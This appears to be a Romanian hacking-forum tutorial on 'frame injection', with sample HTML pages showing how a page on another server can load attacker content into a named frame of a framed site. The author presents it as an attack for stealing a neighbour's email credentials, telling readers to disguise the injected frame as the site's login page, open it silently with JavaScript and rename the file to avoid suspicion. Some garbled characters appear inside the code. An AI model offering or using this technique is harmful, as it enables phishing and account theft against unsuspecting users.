Injectii

Injectari. Toate sunt la moda. Peste tot se gasesc tutoriale de "SQL Injection",
"E-Mail Injection", "PHP Injection"... inca nu am vazut nici un tutorial de "Fr
ame Injection" pe forumurile de aici asa ca m-am apucat sa fac eu unu.
Ce inseamna Form Injection ?
Form Injection e o metoda de atac ca oricare alta. Este motivul pentru care Yaho
o! Si-a schimbat designul vechi (tineti minte varianta cu fram-uri ?). Este moti
vul pentru care multi ISP nu ofera hosting pentru paginile care contin frame-uri
, este motivul pentru care MSIE e luat la suturi toata ziua si Opera ridicat in
slavi
Cum functioneaza Form Injection ?
Ca sa intelegeti functionarea am pregatit cateva pagini HTML simple. Pun mai jos
codul corespunzator fiecarei pagini:
index.html
Cod:
<html><head></head>
<frameset border="0" frameborder="0" framespacing="0" rows="150,*">
A?C?A??ZLAA???A? A?C?A??ZLAA???A? <frame name="frame1" src="frame1.html">
A?C?A??ZLAA???A? A?C?A??ZLAA???A? <frame name="frame2" src="frame2.html">
</frameset>
</html>
frame1.html
Cod:
<html><head></head>
<body bgcolor="#CCCCCC">
Frame1
</body>
</html>
frame2.html
Cod:
<html><head></head>
<body bgcolor="#999999">
Frame2
</body></html>
frame3.html
Cod:
<html><head></head>
<body bgcolor="#FF0000">
Frame3 (cadru injectat)
</body></html>
inj.html
Cod:
<html><head></head>
<body>
<a href="frame3.html" target="frame2">Click aici !</a>
</body></html>
Nimic spectaculos pana aici... revenind la functionalitate. Sa presupunem ca vec
inul X viziteaza zilnic pagina
Y care e construita cu cadre (frame-uri) si va intereseaza niste date care le s
tie vecinul X (conturi de mail sau alte gainarii).
Am presupus ca pagina X este index.html prezentat mai sus care incarca in pagina
2 cadre si anume frame1.html
si frame2.html.
Daca deschideti index.html veti vedea ca cele doua pagini sunt incluse.
OK, now what ? Uploadam inj.html si frame3.html undeva unde avem un cont si il c
onvingem pe vecinul X sa
dea click pe adresa fisierului inj.html. Fisierul inj.html are un link catre fra
me3.html, link care se
deschide ( target= ) in frame2.html. Singurul loc in care este declarat frame2
este pagina Y care o
viziteaza vecinul (in cazul nostru index.html). Daca dati click pe link-ul din
pagina inj.html veti
vedea ca Frame2.html care normal e pe un alt server se deschide in cadrul cu nu
mele frame2 (adica,
al doilea cadru din index.html).
Simplu, nu ? Mai departe totul tine de imaginatie. Modificati frame3.html sa ara
te ca o pagina de
pe site-ul Y in care se cere user si parola (scam), modificati inj.html sa desc
hida pagina automat,
in background (cu javascript) si, bineinteles, puneti-i un nume mai putin suges
tiv
Nota
De mentionat ca tehnica NU functioneaza pe orice browser. Functioneaza pe aproap
e toate variantele
de M$ Internet Explorer, nu functioneaza pe Opera si... testati si voi si spunet
i-mi pe ce l-ati
facut sa mearga
by operabilu